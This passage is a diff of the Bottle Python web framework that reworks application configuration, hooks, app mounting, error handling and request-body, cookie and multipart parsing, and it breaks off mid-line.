@@ -514,66 +620,127 @@ class Bottle(object): let debugging middleware handle exceptions. """ - def __init__(self, catchall=True, autojson=True): - #: If true, most exceptions are caught and returned as :exc:`HTTPError` - self.catchall = catchall + @lazy_attribute + def _global_config(cls): + cfg = ConfigDict() + cfg.meta_set('catchall', 'validate', bool) + return cfg + + def __init__(self, **kwargs): + #: A :class:`ConfigDict` for app specific configuration. + self.config = self._global_config._make_overlay() + self.config._add_change_listener( + functools.partial(self.trigger_hook, 'config')) + + self.config.update({ + "catchall": True + }) + + if kwargs.get('catchall') is False: + depr(0, 13, "Bottle(catchall) keyword argument.", + "The 'catchall' setting is now part of the app " + "configuration. Fix: `app.config['catchall'] = False`") + self.config['catchall'] = False + if kwargs.get('autojson') is False: + depr(0, 13, "Bottle(autojson) keyword argument.", + "The 'autojson' setting is now part of the app " + "configuration. Fix: `app.config['json.enable'] = False`") + self.config['json.disable'] = True + + self._mounts = [] #: A :class:`ResourceManager` for application files self.resources = ResourceManager() - #: A :class:`ConfigDict` for app specific configuration. - self.config = ConfigDict() - self.config.autojson = autojson - - self.routes = [] # List of installed :class:`Route` instances. - self.router = Router() # Maps requests to :class:`Route` instances. + self.routes = [] # List of installed :class:`Route` instances. + self.router = Router() # Maps requests to :class:`Route` instances. self.error_handler = {} # Core plugins - self.plugins = [] # List of installed plugins. - self.hooks = HooksPlugin() - self.install(self.hooks) - if self.config.autojson: - self.install(JSONPlugin()) + self.plugins = [] # List of installed plugins. + self.install(JSONPlugin()) self.install(TemplatePlugin()) + #: If true, most exceptions are caught and returned as :exc:`HTTPError` + catchall = DictProperty('config', 'catchall') - def mount(self, prefix, app, **options): - ''' Mount an application (:class:`Bottle` or plain WSGI) to a specific - URL prefix. Example:: + __hook_names = 'before_request', 'after_request', 'app_reset', 'config' + __hook_reversed = {'after_request'} - root_app.mount('/admin/', admin_app) + @cached_property + def _hooks(self): + return dict((name, []) for name in self.__hook_names) + + def add_hook(self, name, func): + """ Attach a callback to a hook. Three hooks are currently implemented: + + before_request + Executed once before each request. The request context is + available, but no routing has happened yet. + after_request + Executed once after each request regardless of its outcome. + app_reset + Called whenever :meth:`Bottle.reset` is called. + """ + if name in self.__hook_reversed: + self._hooks[name].insert(0, func) + else: + self._hooks[name].append(func) - :param prefix: path prefix or `mount-point`. If it ends in a slash, - that slash is mandatory. - :param app: an instance of :class:`Bottle` or a WSGI application. + def remove_hook(self, name, func): + """ Remove a callback from a hook. """ + if name in self._hooks and func in self._hooks[name]: + self._hooks[name].remove(func) + return True - All other parameters are passed to the underlying :meth:`route` call. - ''' - if isinstance(app, basestring): - prefix, app = app, prefix - depr('Parameter order of Bottle.mount() changed.') # 0.10 + def trigger_hook(self, __name, *args, **kwargs): + """ Trigger a hook and return a list of results. """ + return [hook(*args, **kwargs) for hook in self._hooks[__name][:]] + + def hook(self, name): + """ Return a decorator that attaches a callback to a hook. See + :meth:`add_hook` for details.""" + + def decorator(func): + self.add_hook(name, func) + return func + + return decorator + def _mount_wsgi(self, prefix, app, **options): segments = [p for p in prefix.split('/') if p] - if not segments: raise ValueError('Empty path prefix.') + if not segments: + raise ValueError('WSGI applications cannot be mounted to "/".') path_depth = len(segments) def mountpoint_wrapper(): try: request.path_shift(path_depth) - rs = BaseResponse([], 200) - def start_response(status, header): + rs = HTTPResponse([]) + + def start_response(status, headerlist, exc_info=None): + if exc_info: + _raise(*exc_info) + if py3k: + # Errors here mean that the mounted WSGI app did not + # follow PEP-3333 (which requires latin1) or used a + # pre-encoding other than utf8 :/ + status = status.encode('latin1').decode('utf8') + headerlist = [(k, v.encode('latin1').decode('utf8')) + for (k, v) in headerlist] rs.status = status - for name, value in header: rs.add_header(name, value) + for name, value in headerlist: + rs.add_header(name, value) return rs.body.append + body = app(request.environ, start_response) - body = itertools.chain(rs.body, body) - return HTTPResponse(body, rs.status_code, **rs.headers) + rs.body = itertools.chain(rs.body, body) if rs.body else body + return rs finally: request.path_shift(-path_depth) options.setdefault('skip', True) - options.setdefault('method', 'ANY') + options.setdefault('method', 'PROXY') options.setdefault('mountpoint', {'prefix': prefix, 'target': app}) options['callback'] = mountpoint_wrapper @@ -581,21 +748,74 @@ def start_response(status, header): if not prefix.endswith('/'): self.route('/' + '/'.join(segments), **options) + def _mount_app(self, prefix, app, **options): + if app in self._mounts or '_mount.app' in app.config: + depr(0, 13, "Application mounted multiple times. Falling back to WSGI mount.", + "Clone application before mounting to a different location.") + return self._mount_wsgi(prefix, app, **options) + + if options: + depr(0, 13, "Unsupported mount options. Falling back to WSGI mount.", + "Do not specify any route options when mounting bottle application.") + return self._mount_wsgi(prefix, app, **options) + + if not prefix.endswith("/"): + depr(0, 13, "Prefix must end in '/'. Falling back to WSGI mount.", + "Consider adding an explicit redirect from '/prefix' to '/prefix/' in the parent application.") + return self._mount_wsgi(prefix, app, **options) + + self._mounts.append(app) + app.config['_mount.prefix'] = prefix + app.config['_mount.app'] = self + for route in app.routes: + route.rule = prefix + route.rule.lstrip('/') + self.add_route(route) + + def mount(self, prefix, app, **options): + """ Mount an application (:class:`Bottle` or plain WSGI) to a specific + URL prefix. Example:: + + parent_app.mount('/prefix/', child_app) + + :param prefix: path prefix or `mount-point`. + :param app: an instance of :class:`Bottle` or a WSGI application. + + Plugins from the parent application are not applied to the routes + of the mounted child application. If you need plugins in the child + application, install them separately. + + While it is possible to use path wildcards within the prefix path + (:class:`Bottle` childs only), it is highly discouraged. + + The prefix path must end with a slash. If you want to access the + root of the child application via `/prefix` in addition to + `/prefix/`, consider adding a route with a 307 redirect to the + parent application. + """ + + if not prefix.startswith('/'): + raise ValueError("Prefix must start with '/'") + + if isinstance(app, Bottle): + return self._mount_app(prefix, app, **options) + else: + return self._mount_wsgi(prefix, app, **options) + def merge(self, routes): - ''' Merge the routes of another :class:`Bottle` application or a list of + """ Merge the routes of another :class:`Bottle` application or a list of :class:`Route` objects into this application. The routes keep their 'owner', meaning that the :data:`Route.app` attribute is not - changed. ''' + changed. """ if isinstance(routes, Bottle): routes = routes.routes for route in routes: self.add_route(route) def install(self, plugin): - ''' Add a plugin to the list of plugins and prepare it for being + """ Add a plugin to the list of plugins and prepare it for being applied to all routes of this application. A plugin may be a simple decorator or an object that implements the :class:`Plugin` API. - ''' + """ if hasattr(plugin, 'setup'): plugin.setup(self) if not callable(plugin) and not hasattr(plugin, 'apply'): raise TypeError("Plugins must be callable or implement .apply()") @@ -604,10 +824,10 @@ def install(self, plugin): return plugin def uninstall(self, plugin): - ''' Uninstall plugins. Pass an instance to remove a specific plugin, a type + """ Uninstall plugins. Pass an instance to remove a specific plugin, a type object to remove all plugins that match that type, a string to remove all plugins with a matching ``name`` attribute or ``True`` to remove all - plugins. Return the list of removed plugins. ''' + plugins. Return the list of removed plugins. """ removed, remove = [], plugin for i, plugin in list(enumerate(self.plugins))[::-1]: if remove is True or remove is plugin or remove is type(plugin) \ @@ -618,30 +838,31 @@ def uninstall(self, plugin): if removed: self.reset() return removed - def run(self, **kwargs): - ''' Calls :func:`run` with the same parameters. ''' - run(self, **kwargs) - def reset(self, route=None): - ''' Reset all routes (force plugins to be re-applied) and clear all + """ Reset all routes (force plugins to be re-applied) and clear all caches. If an ID or route object is given, only that specific route - is affected. ''' + is affected. """ if route is None: routes = self.routes elif isinstance(route, Route): routes = [route] else: routes = [self.routes[route]] - for route in routes: route.reset() + for route in routes: + route.reset() if DEBUG: - for route in routes: route.prepare() - self.hooks.trigger('app_reset') + for route in routes: + route.prepare() + self.trigger_hook('app_reset') def close(self): - ''' Close the application and all installed plugins. ''' + """ Close the application and all installed plugins. """ for plugin in self.plugins: if hasattr(plugin, 'close'): plugin.close() - self.stopped = True + + def run(self, **kwargs): + """ Calls :func:`run` with the same parameters. """ + run(self, **kwargs) def match(self, environ): - """ Search for a matching route and return a (:class:`Route` , urlargs) + """ Search for a matching route and return a (:class:`Route`, urlargs) tuple. The second value is a dictionary with parameters extracted from the URL. Raise :exc:`HTTPError` (404/405) on a non-match.""" return self.router.match(environ) @@ -653,21 +874,26 @@ def get_url(self, routename, **kargs): return urljoin(urljoin('/', scriptname), location) def add_route(self, route): - ''' Add a route object, but do not change the :data:`Route.app` - attribute.''' + """ Add a route object, but do not change the :data:`Route.app` + attribute.""" self.routes.append(route) self.router.add(route.rule, route.method, route, name=route.name) if DEBUG: route.prepare() - def route(self, path=None, method='GET', callback=None, name=None, - apply=None, skip=None, **config): + def route(self, + path=None, + method='GET', + callback=None, + name=None, + apply=None, + skip=None, **config): """ A decorator to bind a function to a request URL. Example:: - @app.route('/hello/:name') + @app.route('/hello/<name>') def hello(name): return 'Hello %s' % name - The ``:name`` part is a wildcard. See :class:`Router` for syntax + The ``<name>`` part is a wildcard. See :class:`Router` for syntax details. :param path: Request path or a list of paths to listen to. If no @@ -689,16 +915,19 @@ def hello(name): if callable(path): path, callback = None, path plugins = makelist(apply) skiplist = makelist(skip) + def decorator(callback): - # TODO: Documentation and tests if isinstance(callback, basestring): callback = load(callback) for rule in makelist(path) or yieldroutes(callback): for verb in makelist(method): verb = verb.upper() - route = Route(self, rule, verb, callback, name=name, - plugins=plugins, skiplist=skiplist, **config) + route = Route(self, rule, verb, callback, + name=name, + plugins=plugins, + skiplist=skiplist, **config) self.add_route(route) return callback + return decorator(callback) if callback else decorator def get(self, path=None, method='GET', **options): @@ -717,62 +946,84 @@ def delete(self, path=None, method='DELETE', **options): """ Equals :meth:`route` with a ``DELETE`` method parameter. """ return self.route(path, method, **options) - def error(self, code=500): - """ Decorator: Register an output handler for a HTTP error code""" - def wrapper(handler): - self.error_handler[int(code)] = handler - return handler - return wrapper + def patch(self, path=None, method='PATCH', **options): + """ Equals :meth:`route` with a ``PATCH`` method parameter. """ + return self.route(path, method, **options) - def hook(self, name): - """ Return a decorator that attaches a callback to a hook. Three hooks - are currently implemented: + def error(self, code=500, callback=None): + """ Register an output handler for a HTTP error code. Can + be used as a decorator or called directly :: - - before_request: Executed once before each request - - after_request: Executed once after each request - - app_reset: Called whenever :meth:`reset` is called. - """ - def wrapper(func): - self.hooks.add(name, func) - return func - return wrapper + def error_handler_500(error): + return 'error_handler_500' + + app.error(code=500, callback=error_handler_500) + + @app.error(404) + def error_handler_404(error): + return 'error_handler_404' - def handle(self, path, method='GET'): - """ (deprecated) Execute the first matching route callback and return - the result. :exc:`HTTPResponse` exceptions are caught and returned. - If :attr:`Bottle.catchall` is true, other exceptions are caught as - well and returned as :exc:`HTTPError` instances (500). """ - depr("This method will change semantics in 0.10. Try to avoid it.") - if isinstance(path, dict): - return self._handle(path) - return self._handle({'PATH_INFO': path, 'REQUEST_METHOD': method.upper()}) + + def decorator(callback): + if isinstance(callback, basestring): callback = load(callback) + self.error_handler[int(code)] = callback + return callback + + return decorator(callback) if callback else decorator def default_error_handler(self, res): - return tob(template(ERROR_PAGE_TEMPLATE, e=res)) + return tob(template(ERROR_PAGE_TEMPLATE, e=res, template_settings=dict(name='__ERROR_PAGE_TEMPLATE'))) def _handle(self, environ): + path = environ['bottle.raw_path'] = environ['PATH_INFO'] + if py3k: + environ['PATH_INFO'] = path.encode('latin1').decode('utf8', 'ignore') + + environ['bottle.app'] = self + request.bind(environ) + response.bind() + try: - environ['bottle.app'] = self - request.bind(environ) - response.bind() - route, args = self.router.match(environ) - environ['route.handle'] = route - environ['bottle.route'] = route - environ['route.url_args'] = args - return route.call(**args) - except HTTPResponse: - return _e() - except RouteReset: - route.reset() - return self._handle(environ) + while True: # Remove in 0.14 together with RouteReset + out = None + try: + self.trigger_hook('before_request') + route, args = self.router.match(environ) + environ['route.handle'] = route + environ['bottle.route'] = route + environ['route.url_args'] = args + out = route.call(**args) + break + except HTTPResponse as E: + out = E + break + except RouteReset: + depr(0, 13, "RouteReset exception deprecated", + "Call route.call() after route.reset() and " + "return the result.") + route.reset() + continue + finally: + if isinstance(out, HTTPResponse): + out.apply(response) + try: + self.trigger_hook('after_request') + except HTTPResponse as E: + out = E + out.apply(response) except (KeyboardInterrupt, SystemExit, MemoryError): raise - except Exception: + except Exception as E: if not self.catchall: raise stacktrace = format_exc() environ['wsgi.errors'].write(stacktrace) - return HTTPError(500, "Internal Server Error", _e(), stacktrace) + environ['wsgi.errors'].flush() + environ['bottle.exc_info'] = sys.exc_info() + out = HTTPError(500, "Internal Server Error", E, stacktrace) + out.apply(response) + + return out def _cast(self, out, peek=None): """ Try to convert the parameter into something WSGI compatible and set @@ -789,7 +1040,7 @@ def _cast(self, out, peek=None): # Join lists of byte or unicode strings. Mixed lists are NOT supported if isinstance(out, (tuple, list))\ and isinstance(out[0], (bytes, unicode)): - out = out[0][0:0].join(out) # b'abc'[0:0] -> b'' + out = out[0][0:0].join(out) # b'abc'[0:0] -> b'' # Encode unicode strings if isinstance(out, unicode): out = out.encode(response.charset) @@ -802,7 +1053,8 @@ def _cast(self, out, peek=None): # TODO: Handle these explicitly in handle() or make them iterable. if isinstance(out, HTTPError): out.apply(response) - out = self.error_handler.get(out.status_code, self.default_error_handler)(out) + out = self.error_handler.get(out.status_code, + self.default_error_handler)(out) return self._cast(out) if isinstance(out, HTTPResponse): out.apply(response) @@ -823,13 +1075,13 @@ def _cast(self, out, peek=None): first = next(iout) except StopIteration: return self._cast('') - except HTTPResponse: - first = _e() + except HTTPResponse as E: + first = E except (KeyboardInterrupt, SystemExit, MemoryError): raise - except Exception: + except Exception as error: if not self.catchall: raise - first = HTTPError(500, 'Unhandled exception', _e(), format_exc()) + first = HTTPError(500, 'Unhandled exception', error, format_exc()) # These are the inner types allowed in iterator or generator objects. if isinstance(first, HTTPResponse): @@ -843,8 +1095,7 @@ def _cast(self, out, peek=None): msg = 'Unsupported response type: %s' % type(first) return self._cast(HTTPError(500, msg)) if hasattr(out, 'close'): - new_iter = _iterchain(new_iter) - new_iter.close = out.close + new_iter = _closeiter(new_iter, out.close) return new_iter def wsgi(self, environ, start_response): @@ -856,31 +1107,43 @@ def wsgi(self, environ, start_response): or environ['REQUEST_METHOD'] == 'HEAD': if hasattr(out, 'close'): out.close() out = [] - start_response(response._status_line, response.headerlist) + exc_info = environ.get('bottle.exc_info') + if exc_info is not None: + del environ['bottle.exc_info'] + start_response(response._wsgi_status_line(), response.headerlist, exc_info) return out except (KeyboardInterrupt, SystemExit, MemoryError): raise - except Exception: + except Exception as E: if not self.catchall: raise err = '<h1>Critical error while processing request: %s</h1>' \ % html_escape(environ.get('PATH_INFO', '/')) if DEBUG: err += '<h2>Error:</h2>\n<pre>\n%s\n</pre>\n' \ '<h2>Traceback:</h2>\n<pre>\n%s\n</pre>\n' \ - % (html_escape(repr(_e())), html_escape(format_exc())) + % (html_escape(repr(E)), html_escape(format_exc())) environ['wsgi.errors'].write(err) + environ['wsgi.errors'].flush() headers = [('Content-Type', 'text/html; charset=UTF-8')] - start_response('500 INTERNAL SERVER ERROR', headers) + start_response('500 INTERNAL SERVER ERROR', headers, sys.exc_info()) return [tob(err)] def __call__(self, environ, start_response): - ''' Each instance of :class:'Bottle' is a WSGI application. ''' + """ Each instance of :class:'Bottle' is a WSGI application. """ return self.wsgi(environ, start_response) + def __enter__(self): + """ Use this application as default for all module-level shortcuts. """ + default_app.push(self) + return self + def __exit__(self, exc_type, exc_value, traceback): + default_app.pop() - - + def __setattr__(self, name, value): + if name in self.__dict__: + raise AttributeError("Attribute %s already defined. Plugin conflict?" % name) + object.__setattr__(self, name, value) ############################################################################### # HTTP and WSGI Tools ########################################################## @@ -896,12 +1159,10 @@ class BaseRequest(object): way to store and access request-specific data. """ - __slots__ = ('environ') + __slots__ = ('environ', ) #: Maximum size of memory buffer for :attr:`body` in bytes. MEMFILE_MAX = 102400 - #: Maximum number pr GET or POST parameters per request - MAX_PARAMS = 100 def __init__(self, environ=None): """ Wrap a WSGI environ dictionary. """ @@ -912,70 +1173,87 @@ def __init__(self, environ=None): @DictProperty('environ', 'bottle.app', read_only=True) def app(self): - ''' Bottle application handling this request. ''' + """ Bottle application handling this request. """ raise RuntimeError('This request is not connected to an application.') + @DictProperty('environ', 'bottle.route', read_only=True) + def route(self): + """ The bottle :class:`Route` object that matches this request. """ + raise RuntimeError('This request is not connected to a route.') + + @DictProperty('environ', 'route.url_args', read_only=True) + def url_args(self): + """ The arguments extracted from the URL. """ + raise RuntimeError('This request is not connected to a route.') + @property def path(self): - ''' The value of ``PATH_INFO`` with exactly one prefixed slash (to fix - broken clients and avoid the "empty path" edge case). ''' - return '/' + self.environ.get('PATH_INFO','').lstrip('/') + """ The value of ``PATH_INFO`` with exactly one prefixed slash (to fix + broken clients and avoid the "empty path" edge case). """ + return '/' + self.environ.get('PATH_INFO', '').lstrip('/') @property def method(self): - ''' The ``REQUEST_METHOD`` value as an uppercase string. ''' + """ The ``REQUEST_METHOD`` value as an uppercase string. """ return self.environ.get('REQUEST_METHOD', 'GET').upper() @DictProperty('environ', 'bottle.request.headers', read_only=True) def headers(self): - ''' A :class:`WSGIHeaderDict` that provides case-insensitive access to - HTTP request headers. ''' + """ A :class:`WSGIHeaderDict` that provides case-insensitive access to + HTTP request headers. """ return WSGIHeaderDict(self.environ) def get_header(self, name, default=None): - ''' Return the value of a request header, or a given default value. ''' + """ Return the value of a request header, or a given default value. """ return self.headers.get(name, default) @DictProperty('environ', 'bottle.request.cookies', read_only=True) def cookies(self): """ Cookies parsed into a :class:`FormsDict`. Signed cookies are NOT decoded. Use :meth:`get_cookie` if you expect signed cookies. """ - cookies = SimpleCookie(self.environ.get('HTTP_COOKIE','')) - cookies = list(cookies.values())[:self.MAX_PARAMS] + cookies = SimpleCookie(self.environ.get('HTTP_COOKIE', '')).values() return FormsDict((c.key, c.value) for c in cookies) - def get_cookie(self, key, default=None, secret=None): + def get_cookie(self, key, default=None, secret=None, digestmod=hashlib.sha256): """ Return the content of a cookie. To read a `Signed Cookie`, the `secret` must match the one used to create the cookie (see :meth:`BaseResponse.set_cookie`). If anything goes wrong (missing cookie or wrong signature), return a default value. """ value = self.cookies.get(key) - if secret and value: - dec = cookie_decode(value, secret) # (key, value) tuple or None - return dec[1] if dec and dec[0] == key else default + if secret: + # See BaseResponse.set_cookie for details on signed cookies. + if value and value.startswith('!') and '?' in value: + sig, msg = map(tob, value[1:].split('?', 1)) + hash = hmac.new(tob(secret), msg, digestmod=digestmod).digest() + if _lscmp(sig, base64.b64encode(hash)): + dst = pickle.loads(base64.b64decode(msg)) + if dst and dst[0] == key: + return dst[1] + return default return value or default @DictProperty('environ', 'bottle.request.query', read_only=True) def query(self): - ''' The :attr:`query_string` parsed into a :class:`FormsDict`. These + """ The :attr:`query_string` parsed into a :class:`FormsDict`. These values are sometimes called "URL arguments" or "GET parameters", but not to be confused with "URL wildcards" as they are provided by the - :class:`Router`. ''' + :class:`Router`. """ get = self.environ['bottle.get'] = FormsDict() pairs = _parse_qsl(self.environ.get('QUERY_STRING', '')) - for key, value in pairs[:self.MAX_PARAMS]: + for key, value in pairs: get[key] = value return get @DictProperty('environ', 'bottle.request.forms', read_only=True) def forms(self): """ Form values parsed from an `url-encoded` or `multipart/form-data` - encoded POST or PUT request body. The result is retuned as a + encoded POST or PUT request body. The result is returned as a :class:`FormsDict`. All keys and values are strings. File uploads are stored separately in :attr:`files`. """ forms = FormsDict() + forms.recode_unicode = self.POST.recode_unicode for name, item in self.POST.allitems(): - if not hasattr(item, 'filename'): + if not isinstance(item, FileUpload): forms[name] = item return forms @@ -992,52 +1270,103 @@ def params(self): @DictProperty('environ', 'bottle.request.files', read_only=True) def files(self): - """ File uploads parsed from an `url-encoded` or `multipart/form-data` - encoded POST or PUT request body. The values are instances of - :class:`cgi.FieldStorage`. The most important attributes are: - - filename - The filename, if specified; otherwise None; this is the client - side filename, *not* the file name on which it is stored (that's - a temporary file you don't deal with) - file - The file(-like) object from which you can read the data. - value - The value as a *string*; for file uploads, this transparently - reads the file every time you request the value. Do not do this - on big files. + """ File uploads parsed from `multipart/form-data` encoded POST or PUT + request body. The values are instances of :class:`FileUpload`. + """ files = FormsDict() + files.recode_unicode = self.POST.recode_unicode for name, item in self.POST.allitems(): - if hasattr(item, 'filename'): + if isinstance(item, FileUpload): files[name] = item return files @DictProperty('environ', 'bottle.request.json', read_only=True) def json(self): - ''' If the ``Content-Type`` header is ``application/json``, this - property holds the parsed content of the request body. Only requests - smaller than :attr:`MEMFILE_MAX` are processed to avoid memory - exhaustion. ''' - if 'application/json' in self.environ.get('CONTENT_TYPE', '') \ - and 0 < self.content_length < self.MEMFILE_MAX: - return json_loads(self.body.read(self.MEMFILE_MAX)) + """ If the ``Content-Type`` header is ``application/json`` or + ``application/json-rpc``, this property holds the parsed content + of the request body. Only requests smaller than :attr:`MEMFILE_MAX` + are processed to avoid memory exhaustion. + Invalid JSON raises a 400 error response. + """ + ctype = self.environ.get('CONTENT_TYPE', '').lower().split(';')[0] + if ctype in ('application/json', 'application/json-rpc'): + b = self._get_body_string(self.MEMFILE_MAX) + if not b: + return None + try: + return json_loads(b) + except (ValueError, TypeError): + raise HTTPError(400, 'Invalid JSON') return None - @DictProperty('environ', 'bottle.request.body', read_only=True) - def _body(self): + def _iter_body(self, read, bufsize): maxread = max(0, self.content_length) - stream = self.environ['wsgi.input'] - body = BytesIO() if maxread < self.MEMFILE_MAX else TemporaryFile(mode='w+b') - while maxread > 0: - part = stream.read(min(maxread, self.MEMFILE_MAX)) + while maxread: + part = read(min(maxread, bufsize)) if not part: break - body.write(part) + yield part maxread -= len(part) + + @staticmethod + def _iter_chunked(read, bufsize): + err = HTTPError(400, 'Error while parsing chunked transfer body.') + rn, sem, bs = tob('\r\n'), tob(';'), tob('') + while True: + header = read(1) + while header[-2:] != rn: + c = read(1) + header += c + if not c: raise err + if len(header) > bufsize: raise err + size, _, _ = header.partition(sem) + try: + maxread = int(tonat(size.strip()), 16) + except ValueError: + raise err + if maxread == 0: break + buff = bs + while maxread > 0: + if not buff: + buff = read(min(maxread, bufsize)) + part, buff = buff[:maxread], buff[maxread:] + if not part: raise err + yield part + maxread -= len(part) + if read(2) != rn: + raise err + + @DictProperty('environ', 'bottle.request.body', read_only=True) + def _body(self): + try: + read_func = self.environ['wsgi.input'].read + except KeyError: + self.environ['wsgi.input'] = BytesIO() + return self.environ['wsgi.input'] + body_iter = self._iter_chunked if self.chunked else self._iter_body + body, body_size, is_temp_file = BytesIO(), 0, False + for part in body_iter(read_func, self.MEMFILE_MAX): + body.write(part) + body_size += len(part) + if not is_temp_file and body_size > self.MEMFILE_MAX: + body, tmp = NamedTemporaryFile(mode='w+b'), body + body.write(tmp.getvalue()) + del tmp + is_temp_file = True self.environ['wsgi.input'] = body body.seek(0) return body + def _get_body_string(self, maxread): + """ Read body into a string. Raise HTTPError(413) on requests that are + too large. """ + if self.content_length > maxread: + raise HTTPError(413, 'Request entity too large') + data = self.body.read(maxread + 1) + if len(data) > maxread: + raise HTTPError(413, 'Request entity too large') + return data + @property def body(self): """ The HTTP request body as a seek-able file-like object. Depending on @@ -1048,6 +1377,12 @@ def body(self): self._body.seek(0) return self._body + @property + def chunked(self): + """ True if Chunked transfer encoding was. """ + return 'chunked' in self.environ.get( + 'HTTP_TRANSFER_ENCODING', '').lower() + #: An alias for :attr:`query`. GET = query @@ -1055,37 +1390,36 @@ def body(self): def POST(self): """ The values of :attr:`forms` and :attr:`files` combined into a single :class:`FormsDict`. Values are either strings (form values) or - instances of :class:`cgi.FieldStorage` (file uploads). + instances of :class:`FileUpload`. """ post = FormsDict() + content_type = self.environ.get('CONTENT_TYPE', '') + content_type, options = _parse_http_header(content_type)[0] # We default to application/x-www-form-urlencoded for everything that # is not multipart and take the fast path (also: 3.1 workaround) - if not self.content_type.startswith('multipart/'): - maxlen = max(0, min(self.content_length, self.MEMFILE_MAX)) - pairs = _parse_qsl(tonat(self.body.read(maxlen), 'latin1')) - for key, value in pairs[:self.MAX_PARAMS]: + if not content_type.startswith('multipart/'): + body = tonat(self._get_body_string(self.MEMFILE_MAX), 'latin1') + for key, value in _parse_qsl(body): post[key] = value return post - safe_env = {'QUERY_STRING':''} # Build a safe environment for cgi - for key in ('REQUEST_METHOD', 'CONTENT_TYPE', 'CONTENT_LENGTH'): - if key in self.environ: safe_env[key] = self.environ[key] - args = dict(fp=self.body, environ=safe_env, keep_blank_values=True) - if py31: - args['fp'] = NCTextIOWrapper(args['fp'], encoding='ISO-8859-1', - newline='\n') - elif py3k: - args['encoding'] = 'ISO-8859-1' - data = FieldStorage(**args) - for item in (data.list or [])[:self.MAX_PARAMS]: - post[item.name] = item if item.filename else item.value - return post + post.recode_unicode = False + charset = options.get("charset", "utf8") + boundary = options.get("boundary") + if not boundary: + raise MultipartError("Invalid content type header, missing boundary") + parser = _MultipartParser(self.body, boundary, self.content_length, + mem_limit=self.MEMFILE_MAX, memfile_limit=self.MEMFILE_MAX, + charset=charset) + + for part in parser.parse(): + if not part.filename and part.is_buffered(): + post[part.name] = tonat(part.value, 'utf8') + else: + post[part.name] = FileUpload(part.file, part.name, + part.filename, part.headerlist) - @property - def COOKIES(self): - ''' Alias for :attr:`cookies` (deprecated). ''' - depr('BaseRequest.COOKIES was renamed to BaseRequest.cookies (lowercase).') - return self.cookies + return post @property def url(self): @@ -1097,12 +1431,13 @@ def url(self): @DictProperty('environ', 'bottle.request.urlparts', read_only=True) def urlparts(self): - ''' The :attr:`url` string as an :class:`urlparse.SplitResult` tuple. + """ The :attr:`url` string as an :class:`urlparse.SplitResult` tuple. The tuple contains (scheme, host, path, query_string and fragment), but the fragment is always empty because it is not visible to the - server. ''' + server. """ env = self.environ - http = env.get('HTTP_X_FORWARDED_PROTO') or env.get('wsgi.url_scheme', 'http') + http = env.get('HTTP_X_FORWARDED_PROTO') \ + or env.get('wsgi.url_scheme', 'http') host = env.get('HTTP_X_FORWARDED_HOST') or env.get('HTTP_HOST') if not host: # HTTP 1.1 requires a Host-header. This is for HTTP/1.0 clients. @@ -1126,46 +1461,46 @@ def query_string(self): @property def script_name(self): - ''' The initial portion of the URL's `path` that was removed by a higher + """ The initial portion of the URL's `path` that was removed by a higher level (server or routing middleware) before the application was called. This script path is returned with leading and tailing - slashes. ''' + slashes. """ script_name = self.environ.get('SCRIPT_NAME', '').strip('/') return '/' + script_name + '/' if script_name else '/' def path_shift(self, shift=1): - ''' Shift path segments from :attr:`path` to :attr:`script_name` and + """ Shift path segments from :attr:`path` to :attr:`script_name` and vice versa. :param shift: The number of path segments to shift. May be negative to change the shift direction. (default: 1) - ''' - script = self.environ.get('SCRIPT_NAME','/') - self['SCRIPT_NAME'], self['PATH_INFO'] = path_shift(script, self.path, shift) + """ + script, path = path_shift(self.environ.get('SCRIPT_NAME', '/'), self.path, shift) + self['SCRIPT_NAME'], self['PATH_INFO'] = script, path @property def content_length(self): - ''' The request body length as an integer. The client is responsible to + """ The request body length as an integer. The client is responsible to set this header. Otherwise, the real length of the body is unknown - and -1 is returned. In this case, :attr:`body` will be empty. ''' + and -1 is returned. In this case, :attr:`body` will be empty. """ return int(self.environ.get('CONTENT_LENGTH') or -1) @property def content_type(self): - ''' The Content-Type header as a lowercase-string (default: empty). ''' + """ The Content-Type header as a lowercase-string (default: empty). """ return self.environ.get('CONTENT_TYPE', '').lower() @property def is_xhr(self): - ''' True if the request was triggered by a XMLHttpRequest. This only + """ True if the request was triggered by a XMLHttpRequest. This only works with JavaScript libraries that support the `X-Requested-With` - header (most of the popular libraries do). ''' - requested_with = self.environ.get('HTTP_X_REQUESTED_WITH','') + header (most of the popular libraries do). """ + requested_with = self.environ.get('HTTP_X_REQUESTED_WITH', '') return requested_with.lower() == 'xmlhttprequest' @property def is_ajax(self): - ''' Alias for :attr:`is_xhr`. "Ajax" is not the right term. ''' + """ Alias for :attr:`is_xhr`. "Ajax" is not the right term. """ return self.is_xhr @property @@ -1176,7 +1511,7 @@ def auth(self): front web-server or a middleware), the password field is None, but the user field is looked up from the ``REMOTE_USER`` environ variable. On any errors, None is returned. """ - basic = parse_auth(self.environ.get('HTTP_AUTHORIZATION','')) + basic = parse_auth(self.environ.get('HTTP_AUTHORIZATION', '')) if basic: return basic ruser = self.environ.get('REMOTE_USER') if ruser: return (ruser, None) @@ -1204,12 +1539,25 @@ def copy(self): """ Return a new :class:`Request` with a shallow :attr:`environ` copy. """ return Request(self.environ.copy()) - def get(self, value, default=None): return self.environ.get(value, default) - def __getitem__(self, key): return self.environ[key] - def __delitem__(self, key): self[key] = ""; del(self.environ[key]) - def __iter__(self): return iter(self.environ) - def __len__(self): return len(self.environ) - def keys(self): return self.environ.keys() + def get(self, value, default=None): + return self.environ.get(value, default) + + def __getitem__(self, key): + return self.environ[key] + + def __delitem__(self, key): + self[key] = "" + del (self.environ[key]) + + def __iter__(self): + return iter(self.environ) + + def __len__(self): + return len(self.environ) + + def keys(self): + return self.environ.keys() + def __setitem__(self, key, value): """ Change an environ value and clear all caches that depend on it. """ @@ -1227,46 +1575,63 @@ def __setitem__(self, key, value): todelete = ('headers', 'cookies') for key in todelete: - self.environ.pop('bottle.request.'+key, None) + self.environ.pop('bottle.request.' + key, None) def __repr__(self): return '<%s: %s %s>' % (self.__class__.__name__, self.method, self.url) def __getattr__(self, name): - ''' Search in self.environ for additional user defined attributes. ''' + """ Search in self.environ for additional user defined attributes. """ try: - var = self.environ['bottle.request.ext.%s'%name] + var = self.environ['bottle.request.ext.%s' % name] return var.__get__(self) if hasattr(var, '__get__') else var except KeyError: raise AttributeError('Attribute %r not defined.' % name) def __setattr__(self, name, value): + """ Define new attributes that are local to the bound request environment. """ if name == 'environ': return object.__setattr__(self, name, value) - self.environ['bottle.request.ext.%s'%name] = value + key = 'bottle.request.ext.%s' % name + if hasattr(self, name): + raise AttributeError("Attribute already defined: %s" % name) + self.environ[key] = value + + def __delattr__(self, name): + try: + del 